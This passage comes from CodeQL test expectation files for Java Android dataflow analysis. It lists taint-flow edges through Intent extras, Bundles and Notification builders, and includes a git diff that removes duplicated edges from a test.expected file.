Test.java:715:21:715:41 | getIntent_extras(...) : Bundle [] : String | -| Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | Test.java:722:21:722:41 | getIntent_extras(...) : Bundle [] : Serializable | | Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | Test.java:722:21:722:41 | getIntent_extras(...) 
: Bundle [] : Serializable | | Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | Test.java:729:21:729:41 | getIntent_extras(...) : Bundle [] : Parcelable[] | -| Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | Test.java:729:21:729:41 | getIntent_extras(...) : Bundle [] : Parcelable[] | -| Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | Test.java:736:21:736:41 | getIntent_extras(...) : Bundle [] : Parcelable | | Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | Test.java:736:21:736:41 | getIntent_extras(...) : Bundle [] : Parcelable | | Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | Test.java:743:21:743:41 | getIntent_extras(...) : Bundle [] : CharSequence[] | -| Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | Test.java:743:21:743:41 | getIntent_extras(...) 
: Bundle [] : CharSequence[] | | Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:750:21:750:41 | getIntent_extras(...) : Bundle [] : CharSequence | -| Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:750:21:750:41 | getIntent_extras(...) : Bundle [] : CharSequence | -| Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | Test.java:757:21:757:41 | getIntent_extras(...) : Bundle [] : Bundle | | Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | Test.java:757:21:757:41 | getIntent_extras(...) : Bundle [] : Bundle | | Test.java:769:44:769:51 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:769:24:769:52 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:771:9:771:40 | getMapKey(...) | | Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:771:19:771:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:790:65:790:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:790:45:790:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:792:9:792:40 | getMapKey(...) | | Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:792:19:792:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:813:9:813:40 | getMapKey(...) | | Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:827:9:827:40 | getMapKey(...) | | Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:827:19:827:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:834:21:834:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:834:21:834:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:848:9:848:40 | getMapKey(...) | | Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : ArrayList | Test.java:855:21:855:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:855:21:855:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:867:44:867:51 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:867:24:867:52 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:869:9:869:40 | getMapKey(...) | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:888:65:888:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:888:45:888:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:890:9:890:40 | getMapKey(...) | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:1064:52:1064:59 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:1064:32:1064:60 | newBundleWithMapKey(...) 
: Bundle [] : String | | Test.java:1066:20:1066:22 | out : Set [] : String | Test.java:22:19:22:32 | it : Set [] : String | Test.java:22:44:22:63 | next(...) : String | Test.java:1066:9:1066:23 | getElement(...) | diff --git a/java/ql/test/library-tests/frameworks/android/notification/test.expected b/java/ql/test/library-tests/frameworks/android/notification/test.expected index 65015ad867d..6d9b052cf1b 100644 --- a/java/ql/test/library-tests/frameworks/android/notification/test.expected +++ b/java/ql/test/library-tests/frameworks/android/notification/test.expected 
@@ -223,10 +223,7 @@ edges | Test.java:79:46:79:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:79:46:79:53 | source(...) : Object | Test.java:79:25:79:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:80:18:80:19 | in : Bundle [] : String | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:4 | -| Test.java:80:18:80:19 | in : Bundle [] : String | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:4 | -| Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | Test.java:81:9:81:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:88:16:88:56 | (...)... : Bundle [] : String | Test.java:89:18:89:19 | in : Bundle [] : String | provenance | | 
@@ -234,10 +231,7 @@ edges | Test.java:88:48:88:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:88:48:88:55 | source(...) : Object | Test.java:88:25:88:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:89:18:89:19 | in : Bundle [] : String | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | -| Test.java:89:18:89:19 | in : Bundle [] : String | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | -| Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | Test.java:90:9:90:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -254,15 +248,9 @@ edges | Test.java:112:48:112:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:112:48:112:55 | source(...) : Object | Test.java:112:25:112:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:113:22:113:23 | in : Bundle [] : String | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | | Test.java:113:22:113:23 | in : Bundle [] : String | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:114:10:114:24 | build(...) 
: Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | provenance | MaD:17 | | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | provenance | MaD:17 | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | Test.java:115:9:115:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -319,10 +307,7 @@ edges | Test.java:206:46:206:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:206:46:206:53 | source(...) : Object | Test.java:206:25:206:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:207:18:207:19 | in : Bundle [] : String | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:32 | -| Test.java:207:18:207:19 | in : Bundle [] : String | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:32 | -| Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | Test.java:208:9:208:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:214:16:214:56 | (...)... : Bundle [] : String | Test.java:215:18:215:19 | in : Bundle [] : String | provenance | | 
@@ -330,10 +315,7 @@ edges | Test.java:214:48:214:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:214:48:214:55 | source(...) : Object | Test.java:214:25:214:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:215:18:215:19 | in : Bundle [] : String | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | -| Test.java:215:18:215:19 | in : Bundle [] : String | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | -| Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | Test.java:216:9:216:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -354,15 +336,9 @@ edges | Test.java:244:48:244:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:244:48:244:55 | source(...) : Object | Test.java:244:25:244:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:245:22:245:23 | in : Bundle [] : String | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | | Test.java:245:22:245:23 | in : Bundle [] : String | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | Test.java:247:28:247:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:246:10:246:24 | build(...) 
: Notification [extras, ] : String | Test.java:247:28:247:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:247:28:247:30 | out : Notification [extras, ] : String | Test.java:247:28:247:37 | out.extras : Bundle [] : String | provenance | | | Test.java:247:28:247:30 | out : Notification [extras, ] : String | Test.java:247:28:247:37 | out.extras : Bundle [] : String | provenance | | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | Test.java:247:9:247:38 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -722,10 +698,7 @@ edges | Test.java:851:46:851:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:851:46:851:53 | source(...) : Object | Test.java:851:25:851:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:852:18:852:19 | in : Bundle [] : String | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:110 | -| Test.java:852:18:852:19 | in : Bundle [] : String | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:110 | -| Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | Test.java:853:9:853:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:858:16:858:56 | (...)... : Bundle [] : String | Test.java:859:18:859:19 | in : Bundle [] : String | provenance | | 
@@ -733,10 +706,7 @@ edges | Test.java:858:48:858:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:858:48:858:55 | source(...) : Object | Test.java:858:25:858:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:859:18:859:19 | in : Bundle [] : String | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | -| Test.java:859:18:859:19 | in : Bundle [] : String | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | -| Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | Test.java:860:9:860:43 | getMapValueDefault(...) | provenance | MaD:104 | 
@@ -749,15 +719,9 @@ edges | Test.java:873:48:873:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:873:48:873:55 | source(...) : Object | Test.java:873:25:873:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:874:22:874:23 | in : Bundle [] : String | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | | Test.java:874:22:874:23 | in : Bundle [] : String | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:875:10:875:24 | build(...) 
